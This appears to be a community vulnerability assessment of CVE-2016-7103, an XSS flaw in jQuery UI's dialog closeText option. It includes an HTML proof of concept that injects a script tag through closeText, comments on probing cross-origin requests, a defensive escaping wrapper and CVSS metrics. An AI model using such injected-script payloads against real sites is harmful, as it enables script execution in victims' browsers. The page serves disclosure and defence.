Attacker Value: Low (1 user assessed)
Exploitability: High (1 user assessed)
User Interaction: Required
Privileges Required: None
Attack Vector: Network

CVE-2016-7103

Disclosure Date: March 15, 2017

Description

Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might allow remote attackers to inject arbitrary web script or HTML via the closeText parameter of the dialog function.

Technical Analysis

PoC:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>XSS in closeText option of component ui dialog</title>

<script src="https://code.jquery.com/jquery-2.1.4.js"></script>
<script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
<link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css">


<script>
$(document).ready(function () {
    // This is the attack point where you can inject code
    $('#dialog').dialog({ closeText: '<script>alert("XSS")<\/script>' });

    // if the CORS/CSP policy is not configured or is set up wrong, try a jQuery vuln using $.ajax('https://www.msn.com/robots.txt');
    // if it says onready:1, expand it and you should see msn.com's robots file
    // this is a double whammy of vulnerability in the target
});
</script>

</head>
<body>

<div id="dialog" title="Dialog Title">Content here!</div>

</body>
</html>

Positives: Easy, can potentially execute scripts off remote sites
Negatives: Would likely require user intervention (social engineering or phishing) to make this persistent or of real use

Document on how the dialog function is used in jQuery – https://www.tutorialspoint.com/jqueryui/jqueryui_dialog.htm

Here is a link to a site that will prove which jquery exploits are vuln. to which version (specific to jQuery not UI) – https://research.insecurelabs.org/jquery/test/
More info on exploit and poc: https://vuldb.com/?id.98137

dj substance
https://tranceattic.com
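
A defensive counterpart to the PoC above, as an added example that is not part of the original assessment and is not jQuery UI's own code: a wrapper that HTML-escapes closeText before it reaches dialog() on jQuery UI versions before 1.12.0. The helper names are hypothetical, and treating unparsable versions and 1.12.0 pre-releases as affected is an assumption.

```javascript
"use strict";
// Added example (not jQuery UI's own code); helper names are hypothetical.
const FIXED_IN = "1.12.0"; // from the description: "jQuery UI before 1.12.0"
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// True when uiVersion predates the fix. Unparsable input and 1.12.0
// pre-releases count as affected (assumption: fail closed).
function isAffected(uiVersion) {
  const [core, pre] = String(uiVersion).split("-", 2);
  const have = core.split(".").map(Number);
  const want = FIXED_IN.split(".").map(Number);
  if (have.some(Number.isNaN)) return true;
  for (let i = 0; i < want.length; i++) {
    const h = have[i] || 0;
    if (h !== want[i]) return h < want[i];
  }
  return pre !== undefined;
}

// Encode the characters that let a label break out of text context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Return a copy of the dialog options with closeText neutralised on affected
// versions only; fixed versions already treat it as text, so escaping there
// would display literal entities.
function hardenDialogOptions(options, uiVersion) {
  const out = Object.assign({}, options);
  if (typeof out.closeText === "string" && isAffected(uiVersion)) {
    out.closeText = escapeHtml(out.closeText);
  }
  return out;
}

// Constructed sample: the closeText value from the PoC, treated as untrusted input.
const sample = { title: "Dialog Title", closeText: '<script>alert("XSS")<\/script>' };
console.log(hardenDialogOptions(sample, "1.11.4").closeText); // escaped
console.log(hardenDialogOptions(sample, "1.12.1").closeText); // passed through
// Browser usage: $("#dialog").dialog(hardenDialogOptions(opts, $.ui.version));
```

Upgrading to jQuery UI 1.12.0 or later remains the fix; the wrapper only protects calls routed through it, so code that sets closeText later through the dialog's option method needs the same treatment.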

CVSS V3 Severity and Metrics
Base Score: 6.1 Medium
Impact Score: 2.7
Exploitability Score: 2.8
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

General Information

Reported: February 24, 2021 8:16pm UTC (1 month ago)